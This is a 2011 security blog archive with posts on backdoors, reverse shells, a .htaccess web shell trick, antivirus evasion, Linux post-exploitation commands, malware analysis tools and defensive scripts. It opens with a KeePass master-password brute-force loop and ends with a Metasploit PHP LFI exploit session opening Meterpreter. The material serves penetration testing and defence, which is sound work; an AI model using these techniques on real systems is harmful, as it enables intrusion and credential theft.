for line in sys.stdin:
        passwd = line.rstrip("\r\n")

        try:
                db = kpdb.Database(sys.argv[1], passwd)
                print("Valid password found for %s : %s" % (sys.argv[1], passwd))
                sys.exit(0)
        except ValueError:
                # wrong master password: the library cannot decrypt the database
                pass

print("No valid password found")
sys.exit(1)

Tuesday, August 2, 2011

Software vendors living in the 90's and the big firewall

This post is yet another "my software is behind the firewall" rant; you can safely skip it because you won't miss a thing :)

I already tweeted about this software vulnerability, but reading the vendor's response in the advisory I thought I had to give my two cents.

Basically, their response amounts to saying (please note the sarcasm):
Our software is not meant to be on the Internet and it should be safe behind the big firewall of your organization. Therefore, we do not care if we have a remote buffer overflow that requires no authentication.


To put it into perspective, the software in question is a licensing server used by many vendors across the board (Matlab, Simulink, etc.) and widely deployed in universities and other research institutions, which are their main customers.

So, why do I think their response was not appropriate and, perhaps, idiotic?

  • One of the main characteristics of their customers is the openness of their networks, because they have students and researchers that tend to move around and need to use the licensing software from all over the network. What does it mean? They have no perimeter and the firewall is useless!
  • Since the license server is inside the network and trusted by the customer, chances are that the software is running with privileges on a server that is part of the Windows domain. What does it mean? The vulnerability can be used by an attacker to gain further access to the domain and perhaps gain domain admin privileges as a side effect.
  • Their answer is so 90's that it lets everybody think that they do not care about security and lack all the skills.
  • Since they lack security skills, perhaps they also lack secure coding practices and there are more security vulnerabilities hidden in their software.

Monday, August 1, 2011

Python XMPP backdoor

Following the previous post, I thought it would be nice to find alternative ways to code a backdoor while using Python as the scripting language.

One of my first ideas was to write a simple backdoor that would use some kind of IM (Instant Messaging), like the script kiddies do with IRC. Yes, I can comfortably sit in front of my desk and wait until one of my XMPP bots pops-up in my list of on-line contacts!

I found some easy examples to construct a bot using the python-xmpp library and I reused most of the code.  Pretty script kiddie all together :)

The code can be found here: xmppshell.py

Wednesday, July 13, 2011

Simple Python reverse shell

Some days ago, Rel1k published a post explaining that he decided to include a small Python backdoor in SET.

I gave it a try but I found some problems when executing the script in Linux.

  • The 'quit' command should let the backdoor close the connection and finish its execution, but it was not working.  The string 'quit\n' is received  and the backdoor sends it to the shell instead of quitting.
  • When Control+C is pressed,  the netcat listener finishes the execution and this leaves the backdoor hanging in an infinite loop, consuming lots of resources (while(True){} without any sleep).
I have made a few changes in the script to solve the problems I found and it also connects back again in case we have pressed Control+C by mistake, so we do not lose our shell :)


The modified version can be found here: python_reverse_shell.py



 

Monday, July 11, 2011

Windows Shellbags and Timeline Analysis

I have learned about the Windows Registry and the Shellbags via this good post written by Chad Tilbury on the SANS Computer Forensics blog.

These registry keys store the preferences of each folder that has been opened at least once with Windows Explorer (local, remote, portable devices, etc.). Thus, the simple existence of these entries and their timestamps indicates that the intruder accessed the resources, which is useful as another source of information for our timeline analysis.

The article explains that there are some differences between Windows XP and Windows 7, and the author recommends the tool called Sbag from TZWorks.

Friday, July 8, 2011

Windows ASLR and the False Sense of Security

Lately, I have read a lot about exploits bypassing the ASLR protection. In particular, this post from scriptjunkie.us and this one from corelan.be.

I believe ASLR is a really good protection in systems where all the software makes use of it and there is no room for exceptions, but that is not true for Windows. Since this feature is optional on this platform, it only takes somebody loading into your program a DLL that has ASLR disabled to bypass all the protections that were carefully planned.

We have seen these examples with Java, McAfee and Symantec and I am sure we will find many more in the future, since Microsoft will be trapped supporting old software for a long time, if not forever. The only option I see is the operating system enforcing these protections at a low level.
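Since the opt-in is a single bit in the PE header, an administrator can audit the DLLs on a system for it without any third-party tool. The following is an added example written for this page, not code from the post or from the linked articles: it reads the DllCharacteristics field of the optional header (offset 70 in both PE32 and PE32+) and checks the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag (0x0040), which is what the Windows loader consults to decide whether an image may be relocated under ASLR. The build_pe_stub helper constructs header-only test blobs; they are not loadable images.

```python
#!/usr/bin/env python3
"""Audit PE files (EXE/DLL) for the ASLR opt-in flag IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE."""
import struct
import sys

DYNAMIC_BASE = 0x0040   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE: image may be relocated (ASLR)
NX_COMPAT = 0x0100      # IMAGE_DLLCHARACTERISTICS_NX_COMPAT: image is DEP-compatible


def dll_characteristics(data):
    """Return the DllCharacteristics field from the optional header of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                          # skip signature and COFF file header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):                  # PE32 / PE32+
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+
    return struct.unpack_from("<H", data, opt + 70)[0]


def aslr_enabled(data):
    """True when the image opted in to ASLR."""
    return bool(dll_characteristics(data) & DYNAMIC_BASE)


def build_pe_stub(dll_chars, pe32plus=False):
    """Construct a header-only PE blob for testing (constructed data, not a loadable image)."""
    e_lfanew = 0x80
    hdr = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    opt_size = 240 if pe32plus else 224
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (DLL | executable)
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(hdr) + b"PE\0\0" + coff + bytes(opt)


def audit_files(paths):
    """Return (path, verdict) pairs: 'ASLR', 'no ASLR', or the parse/read error."""
    report = []
    for path in paths:
        try:
            with open(path, "rb") as f:
                data = f.read(65536)            # headers live at the start of the file
            report.append((path, "ASLR" if aslr_enabled(data) else "no ASLR"))
        except (OSError, ValueError, struct.error) as exc:
            report.append((path, "error: %s" % exc))
    return report


if __name__ == "__main__":
    # Usage: audit_aslr.py C:\path\to\plugin.dll ... (any PE files)
    for path, verdict in audit_files(sys.argv[1:]):
        print("%-8s %s" % (verdict, path))
```

Pointed at the DLLs a given process loads (the plugin directories of a browser or of a security product are the interesting ones, given the examples in the post), this lists exactly the modules an attacker would look for, which is the list worth taking to the vendor.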

Friday, July 1, 2011

Monitoring Pastebin Leaks

Yesterday I got some time and I wrote a quick script that continuously monitors pastebin.com, looking for interesting keywords.

The script is called pastebin.py and accepts a file containing regular expressions, one per line.


It also lets you reload the regular expressions without stopping it, by sending it a SIGHUP, and dump to the screen the pastes already found, with SIGUSR1.


This is a sample output:

./pastebin.py ./file.txt
[!] My PID is: 9475
[!] Loading regular expressions



Dumping stored matches:
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXX :  @aol\.com [33 times] || @yahoo\.com [42 times] || @gmail\.com [729 times] || @hotmail\.com [355 times] || [\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4} [5344 times] || @comcast\.net [1 times] || ;
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXX :  @comcast\.net [1 times] || @hotmail\.com [4 times] || @gmail\.com [11 times] || @yahoo\.com [12 times] || [\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4} [37 times] || ;
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXX :  [\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4} [1 times] || INSERT INTO [1 times] || union.+select.+from [7 times] || ;
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXXX :  @yahoo\.com [2 times] || -- phpMyAdmin SQL Dump [1 times] || @gmail\.com [2 times] || [\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4}
 [6 times] || INSERT INTO [1 times] || CREATE TABLE [1 times] || ;
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXXX :  -----BEGIN RSA PRIVATE KEY----- [1 times] || ;
End of dump


Update: a maintained and improved version of this script can be found in Monitoring pastebin.com within your SIEM by Xavier Mertens. It is written in Perl, but I think you can survive the headache :p

Update: It seems that pastebin.com has changed the HTML layout and the regular expressions in the script need to be changed. Since the script is not maintained, you have to make the changes on your own.
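The matching engine and the signal handling described above are independent of the pastebin.com layout that broke, so they are the part worth keeping. The following is an added example written for this page, not the post's pastebin.py: it loads one regex per line from a file, counts the hits of each pattern in a fetched body, stores the matches per URL, reloads the pattern file on SIGHUP and dumps the stored matches on SIGUSR1, in the same "[!] Found Match." layout as the output above. The pattern list and the paste body are constructed sample data; fetching the pastes is left out, since that is the site-specific part.

```python
#!/usr/bin/env python3
"""Keyword monitor core: regex hit counting per fetched text, with reload and dump signals."""
import re
import signal

# Constructed regex list, the kind of file the post's script reads (one pattern per line).
SAMPLE_PATTERNS = r"""
@gmail\.com
[\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4}
-----BEGIN RSA PRIVATE KEY-----
union.+select.+from
"""

# Constructed paste body: fake credentials and a truncated, invalid key; nothing real.
SAMPLE_PASTE = """\
alice@gmail.com:hunter2
bob@example.org:letmein
-----BEGIN RSA PRIVATE KEY-----
MIIBOgIBAAJBAK...
"""


def load_patterns(text):
    """Compile one regex per non-empty, non-comment line; skip lines that fail to compile."""
    patterns = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            patterns.append(re.compile(line, re.IGNORECASE))
        except re.error:
            continue
    return patterns


def count_matches(patterns, body):
    """Return {pattern source: hit count} for the patterns that match at least once."""
    hits = {}
    for p in patterns:
        n = len(p.findall(body))
        if n:
            hits[p.pattern] = n
    return hits


def format_match(url, hits):
    """Render a hit line in the '[!] Found Match.  url :  pat [n times] || ;' layout."""
    parts = " || ".join("%s [%d times]" % (pat, n) for pat, n in hits.items())
    return "[!] Found Match.  %s :  %s || ;" % (url, parts)


class Monitor:
    """Holds the compiled patterns and the stored matches; SIGHUP reloads, SIGUSR1 dumps."""

    def __init__(self, pattern_file):
        self.pattern_file = pattern_file
        self.patterns = []
        self.matches = {}            # url -> hits
        self.reload()

    def reload(self, *_):
        with open(self.pattern_file) as f:
            self.patterns = load_patterns(f.read())

    def scan(self, url, body):
        """Match one fetched paste; remember it if any pattern hit."""
        hits = count_matches(self.patterns, body)
        if hits:
            self.matches[url] = hits
        return hits

    def dump(self, *_):
        lines = ["Dumping stored matches:"]
        lines.extend(format_match(url, hits) for url, hits in self.matches.items())
        lines.append("End of dump")
        return "\n".join(lines)

    def install_signals(self):
        signal.signal(signal.SIGHUP, self.reload)
        signal.signal(signal.SIGUSR1, lambda *a: print(self.dump()))


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; a real monitor would call scan()
    # for every paste it fetches and sleep between polls.
    hits = count_matches(load_patterns(SAMPLE_PATTERNS), SAMPLE_PASTE)
    print(format_match("http://pastebin.com/raw.php?i=XXXXXXXX", hits))
```

Keeping the patterns in a file and reloading on SIGHUP is what makes the monitor usable in practice: the interesting keywords change with every incident, and restarting loses the stored matches.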

Tuesday, June 28, 2011

Analyzing Malicious Websites with Wepawet

Found via this video on securitytube.net:

From the explanation on the  website,

WEPAWET stands for Web Engine to Protect from and Analyze Widespread and Emerging Threats. It is a collection of tools that use static and dynamic techniques to analyze web content to identify possible malicious behavior. It currently supports analyzing Adobe Flash, JavaScript and PDF files.

Therefore, this tool is very useful to quickly analyze compromised websites that are performing drive-by download attacks.

This service is hosted and maintained by the University of California, Santa Barbara.

More information on the support page

Monday, June 27, 2011

Loading Raw Images on VirtualBox

This post is just a reference in case I have to load a raw image onto VirtualBox to make an analysis or just run the system.

I found this blog post that explains how to load a raw OS X image onto VirtualBox, but it should be fairly similar for other operating systems.

Web Exploitation Framework - wXf

wXf is a new framework focused on web application security and written in Ruby, with the look and feel of Metasploit.


I have read some posts written by carnal0wnage as well as watched some videos on Vimeo, and I have to say it looks really interesting :)

I am quite sure that my definition is too simple, but I understand it follows the same principle as Metasploit but oriented to web application security, with the advantage of being well integrated with Burp. Of course, this tool can be really helpful to pen-testers that make extensive use of Burp, because it will let them script many tasks with Buby modules and automate many attacks, saving lots of time.


Doing some searches on Google I also found this video on securitytube.net that corresponds to a talk offered during the APPSEC DC 2010.



wxf: Web Exploitation Framework with Ken Johnson, Fishnet Security and Chris Gates, No Affiliation. from OWASP DC on Vimeo.


Links to carnal0wnage's posts:
http://carnal0wnage.attackresearch.com/2011/05/jruby-buby-wxf-fun.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-1.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-2.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-3.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-4.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-5.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-6.html

Wednesday, June 22, 2011

Didier Stevens' Malicious PDF Analysis Screencasts

Didier Stevens has created a web page with all his screencasts on malicious PDF analysis.

The screencasts teach the viewer how to use his PDF tools. In a nutshell:

  • pdfid.py counts the keywords that matter for triage in the PDF document tree: /Page, /ObjStm, /OpenAction, /AA, /JS, /JavaScript, /Launch, etc. It permits quickly flagging a suspicious file (a one-page document with /OpenAction and /JavaScript is a classic) without parsing its content.
  • pdf-parser.py can be used to extract the contents of a chosen object (-o). This is the tool to inspect the objects of interest, particularly the /OpenAction and /JavaScript ones.
  • It is important to notice that objects can be compressed and encoded by using Filters (/FlateDecode, /ASCIIHexDecode, ...). This technique is used to obfuscate the contents of a malicious file and hide them from an antivirus that does not decode streams. pdf-parser.py reverts these filters with the --filter (-f) option; --raw (-w) shows the original bytes.
  • Another interesting feature is name normalization: the PDF standard permits encoding any character of a name as #xx (hex), so /J#61vaScript is the same name as /JavaScript. Both tools normalize names before matching, which is also a trick that evades antivirus engines that do not understand PDF syntax.

I have also found this old post that Didier wrote in 2008 explaining how a PDF file is structured. If I am not wrong, the example used in the first exercise is a simplified version of the one appearing in the blog post.
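To make the two obfuscations concrete, here is a small Python script (an added example written for this note, not Didier's code) that does a pdfid-style keyword count with name normalization and then inflates the FlateDecode streams the way pdf-parser --filter would. The PDF it scans is a constructed one-page sample built inline, not a real malicious file:

```python
import re
import zlib

# --- constructed sample document (not a real malicious file) -----------------
# A one-page PDF whose /OpenAction points at a JavaScript action. The action's
# names are hex-escaped (/#4A#53 is /JS, /Java#53cript is /JavaScript) and the
# script itself sits in a FlateDecode-compressed stream: the two obfuscations
# pdfid.py and pdf-parser.py undo.
SAMPLE_SCRIPT = b"var s = unescape('%u9090%u9090'); app.alert(s);"
ZSCRIPT = zlib.compress(SAMPLE_SCRIPT)
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    + b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    + b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    + b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    + b"4 0 obj << /S /Java#53cript /#4A#53 5 0 R >> endobj\n"
    + b"5 0 obj << /Length " + str(len(ZSCRIPT)).encode()
    + b" /Filter /FlateDecode >>\nstream\n" + ZSCRIPT + b"\nendstream\nendobj\n"
    + b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Keywords pdfid.py reports; /JS, /JavaScript, /OpenAction, /AA and /Launch
# are the ones that matter for triage.
KEYWORDS = (b"/Page", b"/ObjStm", b"/OpenAction", b"/AA", b"/JS",
            b"/JavaScript", b"/Launch", b"/EmbeddedFile", b"/RichMedia")

# A PDF name is "/" followed by regular characters: anything that is neither
# whitespace nor a delimiter.
DELIMS = rb"\x00\t\n\r\x0c /\[\]<>(){}%"
NAME_RE = re.compile(rb"/[^" + DELIMS + rb"]+")
HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
# dictionary (one level of nesting allowed) followed by its stream body
STREAM_RE = re.compile(
    rb"<<([^<>]*(?:<<[^<>]*>>[^<>]*)*)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def normalize_names(data):
    """Undo #xx escapes inside names so /#4A#53 becomes /JS (what pdfid does)."""
    return NAME_RE.sub(
        lambda m: HEX_RE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(0)),
        data)


def without_stream_bodies(data):
    """Blank stream payloads so binary data cannot produce false keyword hits."""
    return STREAM_RE.sub(lambda m: b"<<" + m.group(1) + b">> stream endstream", data)


def count_keywords(data):
    """pdfid-style keyword counts over the normalized, stream-less document."""
    text = normalize_names(without_stream_bodies(data))
    counts = {}
    for kw in KEYWORDS:
        # the name must end right there: /Page must not also count /Pages
        pat = re.escape(kw) + rb"(?![^" + DELIMS + rb"])"
        counts[kw.decode()] = len(re.findall(pat, text))
    return counts


def decoded_streams(data):
    """Yield (dictionary, payload) for every stream, inflating FlateDecode
    ones (the equivalent of pdf-parser.py --filter)."""
    for m in STREAM_RE.finditer(data):
        dic, body = normalize_names(m.group(1)), m.group(2)
        if b"/FlateDecode" in dic:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass  # damaged or multi-filter stream: keep the raw bytes
        yield dic, body


JS_HINTS = (b"unescape(", b"eval(", b"app.", b"String.fromCharCode")


def scan(data):
    """Triage report: keyword counts plus whether a decoded stream holds JS."""
    report = count_keywords(data)
    report["js_in_streams"] = any(
        hint in body for _, body in decoded_streams(data) for hint in JS_HINTS)
    return report


if __name__ == "__main__":
    for key, value in scan(SAMPLE_PDF).items():
        print(f"{key:>15}: {value}")
```

On a real sample the interesting combination is /OpenAction or /AA together with /JS or /JavaScript in a document with a single /Page. Note that a plain byte search for /JS or /JavaScript over the sample finds nothing at all: that is exactly what the #xx trick is for.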


Monday, June 20, 2011

Browser Exploitation on Rooted 2011

I have found via SecurityByDefault the presentation that Raul Siles gave at RootedCon 2011 [Spanish].

Raul explains how to perform browser exploitation with BeEF and XSS, giving a nice example that combines BeEF and Metasploit. The demo exploits an XSS in a web page to hook the victim's browser and then a Java vulnerability in that browser to gain full access to the victim's computer.




Raúl Siles - Browser Exploitation for Fun and Profit Revolutions (Rooted CON 2011) from rootedcon on Vimeo.

Analyzing Malware Hollow Processes with Volatility

Reading this post I have learned what a hollow process is and how it can be analyzed with Volatility.

What is a Hollow Process?
Process hollowing is a technique used by some malware in which a legitimate process is loaded on the system solely to act as a container for hostile code. At launch, the legitimate code is deallocated and replaced with malicious code. The advantage is that this helps the process hide amongst normal processes better. If you inspect the process and its imports using conventional tools, they all look legit. The PEB is untouched, but the actual code and data of the process have been changed.

A really simple example: create a new notepad.exe process in suspended mode, replace its code and data with our malicious code, and only then resume execution. A quick look at the process list (name, path, parent, imports) shows nothing out of the ordinary (more info in the post).



Then, how do we analyze a compromised system? The article explains the following techniques:

  • Looking for RWX memory regions. The code section of a legitimately mapped image is readable and executable but not writable; a region that is read-write-execute and not backed by a file on disk is a strong hint that code was written there, unless the attacker bothered to fix the protections afterwards. Volatility's malfind plugin looks precisely for this.
  • Dump the process with the procexedump command and compare it with the original binary on the file system (or a known-good copy).
  • Since finding the exact matching binary is difficult, we can also do fuzzy hashing. This technique measures how much content two files have in common: the less similar the dumped process and the legitimate binary are, the more confident we can be that the process was hollowed. They use ssdeep (by Jesse Kornblum).

Thursday, June 16, 2011

Spreading Malware Through the Android Market

Nice post [Spanish] written by SecurityByDefault that shows how simple it is to spread malware through the Android Market.

People seem to perceive the Market as a safe place and a controlled software repository, but it is far from that. Once we create an account and pay the registration fee (20 euros in Europe) we can upload applications without any control or restriction. Therefore, the only barrier is the user's judgement (weak!). In fact, some people downloaded the test applications even though the authors never advertised them!!!

The test consisted in uploading two fully functional applications with some 'extra' functionality. Both pretended to be an inoffensive fortune-cookie program, but they were more than that:

  • Quote It. It leaks the contact list over the GET requests that supposedly download the quotes. The mechanism is simple: encrypt the data and smuggle it out in the cookies of those HTTP requests.
  • Quote Slim. It opens a backdoor on port 8080 that permits executing commands, accessing files, etc.

Wednesday, June 15, 2011

Examples of Attack Remediation for Small and Large Enterprises

I have found this post, which seems to be a summary of a talk given by an employee of Mandiant at FIRST 2011.

The text explains the steps that need to be taken to remediate an attack and the scenarios that a small and a large enterprise can face. It is not meant to be a cheat-sheet but rather field experience and the tactics that helped them succeed.

List of Sandbox Services

This post is just a reference in case I have to use these services in the future.

Via sempersecurus.blogspot.com I have found the list of the most common Sandbox services.

Tuesday, June 14, 2011

Sniffing DECT Phones with Dedected and BT5

Nice article in the BackTrack Wiki that explains how to sniff phone calls made with DECT devices.

The text explains how to install and run Dedected on BT5. I understand they use Audacity to merge all the WAV files generated by Dedected into a single file, but perhaps there are more tools for this purpose (sox can concatenate WAV files from the command line).


UPDATE: I have also  found the following video that explains the whole process


Sniffing DECT phones with BackTrack from smtx on Vimeo.

Analyzing OSX Memory Images with Volafox

I have learned via room362's Twitter, the Volatility blog and computer.forensikblog.de that there is an open-source tool called Volafox that is able to analyze Mac OS X memory images. This tool is written in Python and built on top of Volatility.

Kyeong-Sik Lee and the Korean Digital Forensic Research Center have released Volafox, a free and open-source tool to analyze Mac OS X memory images. Volafox is based on work by Matthieu Suiche (paper and slides) and the Volatility memory analysis framework.

Emulating Zeus DNS Traffic to Test the Defenses

Via Rapid7 I have found a nice post that uses Metasploit to test how our defenses react when a host is infected with the Zeus trojan.

In a nutshell, the author uses the module auxiliary/vsploit/dns/dns_beacon to resolve a list of DNS domain names taken from abuse.ch's ZeuS Tracker. Since these domain names are known to spread malware, our defenses should react and report the incident.

Please note the difference between resolving the DNS name and connecting to the server to fetch the malware. I might be wrong, but many IDS/IPS rules, like a good part of the Emerging Threats signatures, fire on the HTTP connection to the C&C or the dropper, not on the DNS query.

To flag these tests the IDS/IPS must inspect DNS traffic (check whether your ruleset actually loads DNS-query rules for the tracker domains). The other option is to set up a DNS sinkhole that answers these queries with a local address, combined with an IDS rule that flags the connections to the sinkhole.

Friday, June 10, 2011

Cracking Password-Protected SSH Keys with John the Ripper

I have just found this announcement sent by Solar Designer from the Openwall Project.


It seems that they have added support for cracking password-protected SSH private keys:



This community-enhanced release integrates preliminary support for several non-hashes, implemented under Dhiru Kholia's GSoC 2011 project. Specifically, it supports cracking of OpenSSH's passphrase-protected SSH protocol 2 private keys, password-protected PDF files with 40-bit and 128-bit RC4 encryption, and some password-protected RAR archives.

Yes, Dhiru's SSH key cracker includes OpenMP parallelization. There's a limitation, though: this requires OpenSSL 1.0.0 or newer, for thread-safety of the interfaces being used. When building or running with older versions of OpenSSL, OpenMP parallelization in the SSH cracker is automatically disabled. (You can always use MPI instead.)




Encrypting your Dropbox Data with EncFS

I have found this post via Mubix. This is a recurrent subject and I have seen many posts about it in the past.

Since Dropbox offers no end-to-end encryption (the data is readable by the service), many people have thought it would be a good idea to encrypt the content themselves, so only the legitimate owner can access the data. The problem is that many solutions encrypt complete volumes (a single container file), forcing us to sync the whole volume to Dropbox after every change, which is not handy at all.

The advantage of EncFS is that it encrypts per file, so only the files that changed are re-synced, making it really convenient for our purpose (keep in mind that EncFS preserves, and therefore leaks, the directory structure, the number of files and their approximate sizes).

Wednesday, June 8, 2011

Metasploit Linux Post Exploitation

 Via digininja's Twitter account, I have found this blog post that describes a set of Metasploit Linux Post Exploitation modules.


I think the list of executed commands is more or less complete, but I would also add the following:

# currently logged in users, load and uptime
w

# all open sockets (TCP, UDP and Unix) with the owning PID and program name
netstat -pan

# same thing through lsof, only TCP and UDP (-n/-P: no name or port resolution)
lsof -nP -i | egrep "TCP|UDP"

# mount only shows what is mounted right now; fstab may list a commented-out
# or noauto device that is worth a look
cat /etc/fstab

# is the server exporting NFS volumes?
cat /etc/exports

# tree view of all the processes
ps faxu

# last logins; -a puts the complete remote hostname in the last column
last -a

# last login per account, including the ones that never logged in
lastlog

# quick view of the log retention policy (the logrotate default keeps 4 weeks)
ls -lat /var/log

# are they sending logs to a centralized system? look for @host or @@host targets
cat /etc/syslog.conf /etc/rsyslog.conf /etc/rsyslog.d/*.conf 2>/dev/null

Wednesday, June 1, 2011

Htaccess Web Shell

Via Mubix I have found this post that describes a new way to upload a web shell to a server.

The method uploads a .htaccess file to change how the server behaves. The nice trick is that the file itself:

  • Allows .htaccess files to be served (overriding Apache's default deny on .ht* files)
  • Tells Apache that .htaccess files must be handled by the PHP interpreter (AddType), so the file itself is executed by PHP when requested
  • Ends with PHP code that passes commands to the operating system.

As a side note, the author also comments that this trick can be applied to JSP and mod_perl installations.

Some information on securing file uploads, from OWASP. The essentials: never store uploads under a directory where AllowOverride is enabled, do not let users pick the final filename, and whitelist extensions instead of blacklisting them.
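Following on from the OWASP guidance, here is the kind of whitelist validation an upload handler should do, written as an added Python example (not code from the htshell post or from OWASP). The allowed types, their magic bytes and the name policy are my choices for the example:

```python
import os
import re

# Extensions we accept, with the magic bytes the content must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
# A valid image that also carries PHP is a polyglot that still executes if it
# is ever served through the interpreter. Only long markers are used here:
# two-byte ones such as "<%" would false-positive on ordinary binary data.
CODE_MARKERS = (b"<?php", b"<script")


def validate_upload(filename, content):
    """Return (ok, reason_or_safe_name).

    Whitelist, not blacklist: anything that is not a plain 'name.ext' with an
    allowed extension and matching magic bytes is rejected, which covers
    .htaccess, shell.php.jpg, shell.phtml and friends without listing them.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if base.startswith("."):
        return False, "dotfiles are server configuration (.htaccess, .htpasswd)"
    parts = base.split(".")
    if len(parts) != 2:
        return False, "exactly one extension allowed (blocks shell.php.jpg)"
    stem, ext = parts[0], parts[1].lower()
    if not STEM_RE.match(stem):
        return False, "file name contains characters outside [A-Za-z0-9_-]"
    if ext not in ALLOWED:
        return False, f"extension .{ext} is not in the whitelist"
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match the declared type"
    if any(marker in content for marker in CODE_MARKERS):
        return False, "embedded code markers (polyglot file)"
    return True, f"{stem}.{ext}"


if __name__ == "__main__":
    # constructed inputs: the htshell upload and a few classic bypass attempts
    for name, body in [(".htaccess", b"AddType application/x-httpd-php .htaccess"),
                       ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
                       ("x.gif", b"GIF89a<?php system($_GET['c']); ?>"),
                       ("cat.jpg", b"\xff\xd8\xff\xe0")]:
        print(name, "->", validate_upload(name, body))
```

Even with this check in place, store the uploads outside DocumentRoot (or in a directory with AllowOverride None and no script handlers) and generate the stored filename yourself: the .htaccess trick works because the server both accepts the name and honours the file.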

Tuesday, May 31, 2011

Remote DLL injection and Antivirus Evasion

Great post written by Mubix that explains a really interesting technique to bypass an antivirus running on a Windows host.

Mubix points to a DLL written by Didier Stevens that suspends a process and its threads after a delay. The idea is to put the antivirus process to sleep in order to avoid detection during the pentest.

I understand that the DLL must be uploaded to the host before it is loaded into the process memory and, perhaps, the antivirus can use that to flag the DLL before we have a chance to load it. I wonder if this can also be done by Meterpreter without writing to disk.

Monday, May 30, 2011

Pivoting and Post-Explotation (Spanish)

This video (Spanish) corresponds to a talk given at the last RootedCon in Madrid and published by the pentester.es blog. It shows different techniques to pivot through systems in a pentest.


José Selvi - Unprivileged Network Post-Exploitation (Rooted CON 2011) from rootedcon on Vimeo.


I found particularly interesting the mention of the command line kung fu blog.

Props to Paul Asadoorian, Ed Skoudis, Hal Pomeranz and Tim Medin :)

At the end of the video there is a nice demo that uses some shell-fu to discover servers in the internal network and set up the port forwards in Metasploit. Sweet!

Windows EMET: Enforcing Code Execution Protections

This is a good post from darkoperator that explains how to use EMET to enforce code execution protections, like ASLR and DEP, on Windows binaries.

As explained in the post, applications have to be compiled with the right linker flags (/DYNAMICBASE for ASLR, /NXCOMPAT for DEP) to opt in to these protections by default, but EMET can also enable them for a given executable that was not built that way.

Friday, May 27, 2011

Linux Reverse Shells Using Built-in Tools

This post by lanmaster53.com explains how to set up reverse shells on Linux systems (and many Unix flavors).

The different solutions range from Netcat (with and without -e support, i.e. whether it was built with GAPING_SECURITY_HOLE) to crazy combinations of named pipes and telnet connections.

Tuesday, May 24, 2011

Metasploit PHP LFI exploit module

Last week I wrote a simple exploit module for Metasploit to attack PHP applications with LFI vulnerabilities.

It uses php://input to inject the code, and falls back to the web server logs otherwise (planting PHP in a request field that gets logged, then including the log file).

If I had time, I would like to implement some other tricks, like injecting PHP code through the SSH logs or the e-mail server logs, but that is not possible for now :)

Note: it is really buggy and the injection may not be successful depending on the length of the payload. Please remember that PHP limits the size of the POST body (post_max_size) and a long payload may be cut. The same problem applies to log file injection, where the web server limits the size of a request header (Apache's LimitRequestFieldSize, 8190 bytes by default).


msf exploit(handler) > use exploit/unix/webapp/php_lfi
msf exploit(php_lfi) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_lfi) > set RPORT 8181
RPORT => 8181
msf exploit(php_lfi) > set URI /index.php?foo=xxLFIxx
URI => /index.php?foo=xxLFIxx
msf exploit(php_lfi) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_lfi) > exploit -z

[*] Started bind handler
[*] Trying generic exploits
[*] Clean LFI injection
[*] Sending stage (31612 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:19412 -> 127.0.0.1:4444) at Tue May 24 14:47:29 +0200 2011
